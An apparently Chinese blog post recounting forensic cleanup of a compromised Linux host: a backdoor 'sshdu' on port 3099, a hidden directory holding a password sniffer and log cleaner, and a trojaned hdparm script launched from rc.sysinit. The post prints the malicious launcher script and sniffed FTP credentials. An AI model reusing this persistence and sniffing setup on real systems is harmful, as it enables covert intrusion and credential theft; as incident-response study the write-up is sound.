一次入侵检测经过

从零到一:Ubuntu22.04下VSCode与中文输入法的深度整合指南 本文详细介绍了在Ubuntu22.04系统中如何深度整合VSCode与中文输入法,包括环境准备、安装方案对比、输入法配置及常见问题解决方案。通过fcitx框架优化中文输入体验,提供从基础设置到高级调试的全方位指南,帮助开发者提升在Linux环境下的开发效率。 阅读详情
作者:zwq

朋友主机遭到入侵。

superscan 扫描目标主机有开端口3099

以root身份登陆入侵主机

查看端口开放情况!
[root@RredDhatT bin]# netstat -a  
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 *:auth                  *:*                     LISTEN      
tcp        0      0 *:ftp                   *:*                     LISTEN      
tcp        0      0 *:telnet                *:*                     LISTEN      
tcp        0      0 *:www                   *:*                     LISTEN      
.....
tcp        0      0 RredDhatT:7070          *:*                     LISTEN      
tcp        0      0 RredDhatT:554           *:*                     LISTEN      
tcp        0      0 *:3099                  *:*                     LISTEN      
tcp        0      0 localhost:554           localhost:2869          TIME_WAIT  
                        
Active UNIX domain sockets (including servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         DGRAM                    421    
unix  0      [ ]         DGRAM                    433    
u.........
unix  0      [ ACC ]     STREAM     LISTENING     544    /tmp/.font-unix/fs-1
unix  6      [ ]         DGRAM                    411    /dev/log
unix  0      [ ]         STREAM     CONNECTED     192    @00000018

发现开有未明端口3099



用ps -aux查看非法进程
[root@RredDhatT bin]# ps -aux
USER       PID %CPU %MEM  SIZE   RSS TTY STAT START   TIME COMMAND
daemon     467  0.0  0.0  1144   104  ?  S  Mar 19   0:00 /usr/sbin/atd
nobody     449  0.0  0.0  1284   164  ?  S  Mar 19   0:00 identd -e -o
nobody     450  0.0  0.0  1284   164  ?  S  Mar 19   0:05 identd -e -o
nobody     454  0.0  0.0  1284   164  ?  S  Mar 19   0:00 identd -e -o
......
root      6249  0.0  0.2  1940  1176  ?  S   22:49   0:00 vi test
root      6259  0.0  0.0   940   416  ?  R   22:56   0:00 ps -aux
root     16560  0.0  0.1  1212   572  ?  S   21:58   0:00 in.telnetd: bbb                                        
root     16569  0.0  0.2  2228  1120  ?  S   21:58   0:00 login -- vod        
root     16742  0.0  0.1  2156   948  ?  S   21:58   0:00 su
root     16775  0.0  0.1  1748  1000  ?  S   21:58   0:00 bash
vod       6170  0.0  0.1  1696   940  ?  S   22:39   0:00 -bash
vod      16673  0.0  0.1  1696   940  ?  S   21:58   0:00 -bash
xfs        572  0.0  0.0  2060    60  ?  S  Mar 19   0:00 xfs -droppriv -daemon -port -1


为发现异常。



用lsof查看(list open file)
[root@RredDhatT /root]# /usr/sbin/lsof >test
[root@RredDhatT /root]# vi test  或 grep 3099 *

查看test文件中是否包含3099字样!
COMMAND     PID USER   FD   TYPE     DEVICE    SIZE      NODE NAME
test:sshdu      6224 root    3u  IPv4      28244               TCP *:3099 (LISTEN)
找到执行程序!!


执行程序为sshdu
先杀了在说!!
[root@RredDhatT /root]# kill 6224

确认3099关闭!!
[root@RredDhatT /root]# netstat -a -n
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:113             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      
............
tcp        0      0 127.0.0.1:554           127.0.0.1:2894          TIME_WAIT  
raw        0      0 0.0.0.0:1               0.0.0.0:*                          
Active UNIX domain sockets (including servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         DGRAM                    421    
unix  0      [ ]         DGRAM                    433    
unix  0      [ ]         DGRAM                    548    
..........
unix  0      [ ACC ]     STREAM     LISTENING     544    /tmp/.font-unix/fs-1
unix  6      [ ]         DGRAM                    411    /dev/log
unix  0      [ ]         STREAM     CONNECTED     192    @00000018
端口3099关闭!!!



查找sshdu位置!
[root@RredDhatT /root]# locate sshdu
/dev/ida/.inet/sshdu

[root@RredDhatT ida]# ls *net -l
ls: *net: No such file or directory

没有此目录!TNND!!!
[root@RredDhatT ida]# cd .inet

可以进去!!
[root@RredDhatT .inet]# ll
total 768
-rwx------    1 root     root         7165 Sep 26  1983 linsniffer
-rwx------    1 root     root           75 Sep 26  1983 logclear
-rw-r--r--    1 root     root            5 Mar 24 06:42 pid
-rw-r--r--    1 root     root          704 Feb  2 20:02 s
-rwxr-xr-x    1 root     root         4060 Sep 26  1983 sense
-rwx------    1 root     root         8268 Sep 26  1983 sl2
-rw-------    1 root     root          541 Sep 26  1983 ssh_host_key
-rw-------    1 root     root          512 Mar 24 06:42 ssh_random_seed
-rwxr-xr-x    1 root     root       686535 Dec  3 04:37 sshdu
-rw-r--r--    1 root     root        47889 Mar 24 06:52 tcp.log
[root@RredDhatT .inet]# cd ..

[root@RredDhatT ida]# ls .inet -d -l
drwxr-xr-x    2 root     root         4096 Feb 14 11:43 .inet

建成时间为2.14,居然在人们约会的时候进来!!,高!!!


[root@RredDhatT /root]# cd .inet
[root@RredDhatT .inet]# more tcp.log

192.168.10.112 => server [21]
USER root
PASS adsdfa!@#
PWD
RETR /usr/local/Logs/rmaccess.log
QUIT

tcp.log中记录了所有登陆名字和密码以及command记录!!!!


查找从何处开始执行sshdu:
[root@RredDhatT bin]# find /etc -type f -exec grep -s sshdu {} ; -print

没有结果!!!

继续!!!!

[root@RredDhatT bin]# find /bin -type f -exec grep -s sshdu {} ; -print
[root@RredDhatT bin]# find /sbin -type f -exec grep -s sshdu {} ; -print
[root@RredDhatT bin]# find /usr -type f -exec grep -s sshdu {} ; -print
./sshdu -f ./s
/usr/bin/hdparm

终于找到了宿主文件!!

[root@RredDhatT bin]# cd /usr/bin/      
[root@RredDhatT bin]# ls hd* -l
-r-x------    1 root     root           76 Nov 12 06:01 hdparm
[root@RredDhatT bin]# more hdparm
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
[root@RredDhatT bin]#
把linsniffer的进程先杀掉!

在/etc目录中找hdparm:

[root@RredDhatT bin]# find /etc -type f -exec grep -s hdparm {} ; -print

/usr/bin/hdparm -t1 -X53 -p
/etc/rc.d/rc.sysinit
                
找到源头!!!
[root@RredDhatT /root]# vi /etc/rc.d/rc.sysinit
#/usr/bin/hdparm -t1 -X53 -p

reboot!
搞到一个sniffer的好东东!!!
SKF SimPro Quick 4.8.1发布 发布说明可以在SimPro手册的SKF SimPro Quick应用程序的一般部分下找到(帮助→SKF SimPro快速手册→一般→发布说明)。请删除旧版本,请备份您存储在C:\SKF SimPro xxx\files文件夹中的文件以及所有自定义报告模板和表格。我们很高兴地通知您,我们的轴承应用工程软件SKF SimPro Quick 4.8.1可供下载。将新的安装文件下载到本地计算机后,双击它安装向导将打开(按照说明操作)3.安装后,在本地机器上启动SKF SimPro Expert软件。 阅读详情

相关推荐

一种多区域视频监控入侵检测报警方法的研究

一种多区域视频监控入侵检测报警方法的研究

VS远程调试

在客户现场出现异常,本地又很难复现,也找不出问题所在,而且重启软件可能又自动恢复了。远程工具安装只要几分钟就搞定,操作简单,可以一试

Evelyn_LiuZhen 762

摄像头实时监控与报警系统(Opencv)

基于Opencv的摄像头实时监控与报警系统设计,内附源代码,运行程序直接打开摄像头。

常见网络端口及其服务

# tcpmux 1/tcp 0.001995 # TCP Port Service Multiplexer [rfc-1078] tcpmux 1/udp 0.001236 # TCP Port Service Multiplexer compressnet 2/tcp 0.000013 # Management Utility compressnet 2/udp 0.001845 # Mana

煜铭2011 8万+

TCP/IP PORT NUMBERS 2890后的端口(继续一)

 #      Justine Higgins cspclmulti      2890/tcp   CSPCLMULTIcspclmulti      2890/udp   CSPCLMULTI#      Yoneda Terumasa cinegrfx-elmd   2891/tcp   CINEGRFX-ELMD License Managercinegrfx-elmd   2891/ud

zly22169846的专栏 7万+

linux开放3309端口,生信人的Linux练习

生信人的linux考试20题一、 在任意文件夹下面创建形如 1/2/3/4/5/6/7/8/9 格式的文件夹系列vip39@VM-0-15-ubuntu:~/test$ mkdir -p 1/2/3/4/5/6/7/8/9vip39@VM-0-15-ubuntu:~/test$ ls1vip39@VM-0-15-ubuntu:~/test$ tree.└── 1└── 2└── 3└── 4└──...

weixin_39775872的博客 1003

Windows五种命令的用法

IPConfig实用程序和它的等价图形用户界面——Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。 PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序 [1] 。Ping是工作在 TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo

qaqling的博客 441

什么是Jython--jython介绍

[size=large][b]什么是Jython--jython介绍[/b][/size] 相关搜索: Jython, 介绍, 什么, jpython Jython是两种广泛流行语言Java和Python的组合。Java已被广泛地接受,这可从很多公司都已配置了基于Java的应用得以见证。另外Java有庞大的可利用的类库,并有很详尽的文档。Python则具有很好的灵活性,开发快速,容易使...

走向程序员的一条道 429

Jython介绍

2019独角兽企业重金招聘Python工程师标准>>> ...

weixin_33778544的博客 204

Python, CPython, Pypy, Jython的简单介绍

简单地说,Python是一门编程语言,任何一种编程语言都需要用另一种语言来实现它,比如C语言就是用机器语言来实现的。所以,Python根据实现方式不同分为了CPyhton、Pypy、Jython等。CPythonCPython是用C语言实现Pyhon,是目前应用最广泛的解释器。Python最新的语言特性都是在这个上面先实现,Linux,OS X等自带的也是这个版本,包括Anaconda里面用的也是C

红色石头的专栏 2万+

介绍 Jython

Jython本词条主要介绍 Jython<br /> Jython是一种完整的语言,而不是一个Java翻译器或仅仅是一个Python编译器,它是一个Python语言在Java中的完全实现。 Jython也有很多从CPython中继承的模块库。最有趣的事情是Jython不像CPython或其他任何高级语言,它提供了对其实现语言的一切存 取。所以Jython不仅给你提供了Python的库,同时也提供了所有的Java类。这使其有一个巨大的资源库。  <br />目录什么是Jython(旧称JPython)

Fred Lee的程序人生 905

Cpython和Jython的对比介绍

CPython 当我们从Python官方网站下载并安装好Python 3.x后,我们就直接获得了一个官方版本的解释器:CPython。这个解释器是用C语言开发的,所以叫CPython。在命令行下运行python就是启动CPython解释器。 CPython是使用最广的Python解释器。教程的所有代码也都在CPython下执行。 Jython是运行在Java平台上的Python解释器,可以直...

weixin_30699955的博客 426

python与java对接工具Jython介绍

Java编程精选点击右侧关注,免费入门到精通!作者丨python人工智能找电子书https://www.jianshu.com/p/51d64bb620cc快速入门下面我...

<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd 750

java调用python方法的库jython介绍及使用实例

2019独角兽企业重金招聘Python工程师标准>>> ...

weixin_34248487的博客 625

python和c-Cpython和Jython的对比介绍

CPython当我们从Python官方网站下载并安装好Python 3.x后,我们就直接获得了一个官方版本的解释器:CPython。这个解释器是用C语言开发的,所以叫CPython。在命令行下运行python就是启动CPython解释器。CPython是使用最广的Python解释器。教程的所有代码也都在CPython下执行。Jython是运行在Java平台上的Python解释器,可以直接把Pyth...

weixin_37988176的博客 193

python cpython关系_Cpython和Jython的对比介绍

CPython当我们从Python官方网站下载并安装好Python 3.x后,我们就直接获得了一个官方版本的解释器:CPython。这个解释器是用C语言开发的,所以叫CPython。在命令行下运行python就是启动CPython解释器。CPython是使用最广的Python解释器。教程的所有代码也都在CPython下执行。Jython是运行在Java平台上的Python解释器,可以直接把Pyth...

weixin_39640687的博客 405

python代码转java工具_python与java对接工具Jython介绍

快速入门下面我们使用jython来调用自定义jar包中的类。编辑java文件:Beach.javapublic class Beach {private String name;private String city;public Beach(String name, String city){this.name = name;this.city = city;}public String get...

weixin_39524959的博客 982

java和python程序合并_python与java对接工具Jython介绍

快速入门下面我们使用jython来调用自定义jar包中的类。编辑java文件:Beach.javapublicclassBeach{privateStringname;privateStringcity;publicBeach(Stringname,Stringcity){this.name=name;this.city=...

weixin_39628594的博客 227

中国人民大学中关村校区我的世界地图存档Obj模型文件_基于MinecraftJava版1193平台由学生独立开发历时一年完成的中关村校园完整复原项目包含详细建筑模型与.zip

中国人民大学中关村校区我的世界地图存档Obj模型文件_基于MinecraftJava版1193平台由学生独立开发历时一年完成的中关村校园完整复原项目包含详细建筑模型与.zip

上一篇: 缓冲区溢出历史回顾
下一篇: 关于大学生终极价值观的调查报告
flycock
博客等级 码龄21年 20粉丝 114原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值